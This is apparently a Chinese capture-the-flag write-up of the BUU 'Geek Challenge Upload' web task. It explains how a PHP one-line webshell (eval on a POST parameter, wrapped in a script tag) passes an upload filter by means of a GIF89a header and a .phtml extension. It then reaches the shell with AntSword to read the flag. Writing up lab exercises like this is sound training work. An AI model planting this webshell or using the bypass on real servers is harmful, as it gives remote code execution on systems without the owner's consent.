BUU_Web 极客大挑战 Upload
打开题目网址,文件上传:
尝试上传 webshell.php ,一句话木马:
看来是不能上传 .php,抓包发现需要上传jpg格式图片:
将文件后缀格式改成 jpg 格式:
<? 被检测,只能换一种一句话木马了,:
<script language="php">eval($_POST['cmd']);</script>
提示检测到不完全是图片,写入 jpg 格式文件头,再次上传,仍然显示不完全是图片,写入GIF格式文件头:GIF89a ,再次尝试上传:
上传成功,接下来需要用 burpsuite ,进行抓包改包,既然 php 后缀不能用了,php常用后缀: php,php3,php4,php5,phtml,pht,phtm,尝试更改后缀,发现 phtml 可用:
修改文件后缀后,对文件进行访问,进入 /upload下(大佬们提示一般都是 /upload):
访问成功,打开蚁剑,一键连接,右键打开虚拟终端,cat flag,拿下: